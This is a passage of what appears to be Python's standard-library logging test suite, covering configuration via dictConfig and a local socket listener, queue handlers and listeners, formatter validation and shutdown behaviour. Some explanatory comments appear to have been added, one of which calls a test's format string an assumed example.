self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
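# logging.config.listen() expects the same framing as SocketHandler:
# a 4-byte big-endian length followed by the configuration bytes,
# which is what gets sent below over a plain TCP connection.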
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raised as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
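# Quick reference for the cfg:// resolution exercised above: dotted access
# ('cfg://adict.d') and indexed access ('cfg://adict[f]') both work for
# dicts, numeric indices ('cfg://alist[1]') work for sequences, unknown
# keys raise KeyError, and malformed paths raise ValueError.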
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
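# The '()' key in the handler section tells dictConfig to call the given
# factory directly, passing the remaining keys ('resource' here) as
# keyword arguments, which is how the namedtuple reaches MyHandler intact.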
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
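# respect_handler_level=True (3.5+) makes the listener honour each
# handler's own level instead of passing every record through, which is
# why only the CRITICAL record survives in the second half above.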
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that the traceback is appended only once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return  # a bare return ends the generator cleanly
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
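# Minimal fixed-offset tzinfo used by the formatter tests below; pinning
# time conversions to UTC keeps the asctime checks independent of the
# local timezone.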
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
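# Caveat, preserved from the original helper above: when a callable is
# supplied, assertRaises consumes the exception itself, so the except
# clause (and thus the message comparison) is effectively dead code; the
# helper primarily verifies that the exception is raised at all.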
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
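# $-style formats follow string.Template rules, as exercised above: both
# '$name' and '${name}' substitute a field, and '$$' escapes a literal '$'.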
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Test that ValueError is raised for incorrect format strings
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion. The original call omitted the
# callable under test; the format string below is an assumed example
# whose '!Z' conversion triggers the expected error.
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'",
logging.Formatter, '{asctime!Z:15}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatched braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for a bare '$'
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatched style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
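# The ValueErrors checked in this test come from Formatter's 'validate'
# keyword (default True since 3.8); constructing with validate=False
# skips these style checks entirely.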
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
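# formatTime() with no datefmt uses the default '%Y-%m-%d %H:%M:%S'
# layout and appends milliseconds via ',%03d', which is why the record
# above renders as '1993-04-21 08:03:00,123'.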
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
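# shutdown() walks the handler list in reverse order of creation, which
# is why handler 2 is acquired, flushed and closed before 1 and 0 above.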
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
